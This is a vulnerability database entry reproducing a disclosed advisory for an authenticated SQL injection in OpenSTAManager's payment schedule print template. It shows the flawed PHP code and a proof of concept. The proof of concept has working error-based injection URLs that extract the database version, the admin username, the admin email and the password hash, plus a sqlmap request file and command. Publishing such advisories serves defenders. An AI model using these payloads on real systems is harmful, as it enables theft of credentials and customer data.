📄 OpenSTAManager 2.9.8 SQL Injection

🗓️ 13 Apr 2026 00:00:00Reported by Łukasz RybakType

Authenticated injection in OpenSTAManager Scadenzario template exposes database data.

Reporter	Title	Published	Views	Family All 15
GithubExploit	Exploit for SQL Injection in Devcode Openstamanager	11 Apr 202619:13	–	githubexploit
ATTACKERKB	CVE-2025-69216	6 Feb 202618:10	–	attackerkb
Circl	CVE-2025-69216	6 Feb 202616:48	–	circl
CNNVD	OpenSTAManager SQL注入漏洞	6 Feb 202600:00	–	cnnvd
CVE	CVE-2025-69216	6 Feb 202618:10	–	cve
Cvelist	CVE-2025-69216 OpenSTAManager has an SQL Injection in Scadenzario Print Template	6 Feb 202618:10	–	cvelist
EUVD	EUVD-2025-206886	6 Feb 202618:10	–	euvd
Github Security Blog	OpenSTAManager has a SQL Injection in Scadenzario Print Template	6 Feb 202618:06	–	github
NVD	CVE-2025-69216	6 Feb 202619:16	–	nvd
OSV	CVE-2025-69216 OpenSTAManager has an SQL Injection in Scadenzario Print Template	6 Feb 202618:10	–	osv

# CVE-2025-69216: OpenSTAManager has a SQL Injection in Scadenzario Print Template
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | [CVE-2025-69216](https://nvd.nist.gov/vuln/detail/CVE-2025-69216) |
    | **Severity** | HIGH |
    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6) |
    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
    
    ## Affected Products
    
    - **devcode-it/openstamanager** (versions: <= 2.9.8)
    
    
    ## CWE Classification
    
    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
    
    ## Details
    
    ### Summary
    An **authenticated SQL injection vulnerability** in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.
    
    ### Details
    
    The vulnerability exists in `templates/scadenzario/init.php` at **line 46**, where the `id_anagrafica` parameter is directly concatenated into an SQL query without proper sanitization:
    
    **Vulnerable Code:**
    ```php
    if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
        $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
        $id_anagrafica = get('id_anagrafica');
    }
    ```
    
    The `get()` function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's `prepare()` sanitization function, enabling SQL injection attacks.
    
    **Root Cause:**
    - Missing use of `prepare()` function for input sanitization
    - Direct string concatenation in SQL query construction
    - No input validation or type checking
    
    **Affected Endpoint:**
    ```
    /pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]
    ```
    
    **Affected Files:**
    - `templates/scadenzario/init.php` (line 46) - **Primary vulnerability**
    - `templates/scadenzario/init.php` (lines 34, 40) - Similar pattern with date parameters
    - `pdfgen.php` - Entry point for template rendering
    
    
    ---
    
    ### PoC (Proof of Concept)
    
    #### Prerequisites
    - Valid authenticated session (any user role)
    
    #### Exploitation Steps
    
    **1. Confirm Vulnerability - Basic Syntax Error Test:**
    ```bash
     http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20
    ```
    
    SQL syntax error displayed in application response
    
    <img width="2195" height="392" alt="image" src="https://github.com/user-attachments/assets/f62ca7b4-2397-4f90-8698-6cf7f867d102" />
    
    ---
    
    **2. Extract Database Version - Error-Based SQLi:**
    ```bash
    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221
    ```
    
    **Result:** `~8.3.0~` (MySQL version)
    
    <img width="2061" height="378" alt="image" src="https://github.com/user-attachments/assets/8ea16c47-36cc-4c25-a624-b42ccfcdf52f" />
    
    ---
    
    **3. Extract Database Name:**
    ```bash
    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221
    ```
    
    **Result:** `~openstamanager~`
    
    <img width="1954" height="345" alt="image" src="https://github.com/user-attachments/assets/47479297-5271-4c03-b242-efa513eb28f8" />
    
    ---
    
    **4. Extract Admin Username:**
    ```bash
    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
    ```
    
    **Result:** `~admin~`
    <img width="1998" height="332" alt="image" src="https://github.com/user-attachments/assets/9f8363cb-8da9-4e8f-8744-ef38c9706be8" />
    
    ---
    
    **5. Extract Admin Email:**
    ```bash
    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
    ```
    
    **Result:** Admin email address
    
    <img width="2006" height="339" alt="image" src="https://github.com/user-attachments/assets/4dcd5ea4-4eea-4730-8d39-b8ce2da46e84" />
    
    ---
    
    **6. Extract Password Hash (Partial - XPATH 31 char limit):**
    ```bash
    http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221
    ```
    
    **Result:** bcrypt password hash
    
    <img width="1924" height="328" alt="image" src="https://github.com/user-attachments/assets/27b711f3-9bb6-4909-a5bd-a04177c9f219" />
    
    ---
    
    **7. Automated Exploitation with SQLMap:**
    
    Create request file `sqli_osm.req`:
    ```http
    GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
    Host: localhost:8081
    Cookie: PHPSESSID=[SESSION_COOKIE]
    User-Agent: Mozilla/5.0
    ```
    
    Run SQLMap:
    ```bash
    sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs
    ```
    
    **SQLMap Confirmed Injection Types:**
    - ✅ Boolean-based blind SQL injection
    - ✅ Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET)
    - ✅ Time-based blind SQL injection (SLEEP)
    
    <img width="1498" height="516" alt="image" src="https://github.com/user-attachments/assets/b733f025-ac4b-4b36-a20e-76d826005f62" />
    
    ---
    
    ### Impact
    
    **Who is Impacted:**
    - ✅ **All authenticated users** - Any user with valid credentials can exploit this vulnerability
    - ✅ **Low-privilege users** - Even users with minimal permissions can access admin-level data
    - ✅ **All OpenSTAManager installations** - Vulnerability exists in the latest master branch
    ---
    
    ### Attribution
    Reported by Łukasz Rybak
    
    ## References
    
    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69216
    - https://github.com/advisories/GHSA-q6g3-fv43-m2w6
    
    
    ## Disclaimer
    
    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.

13 Apr 2026 00:00Current

5.9Medium risk

Vulners AI Score5.9

CVSS 3.16.5

CVSS 48.7

EPSS0.00013

SSVC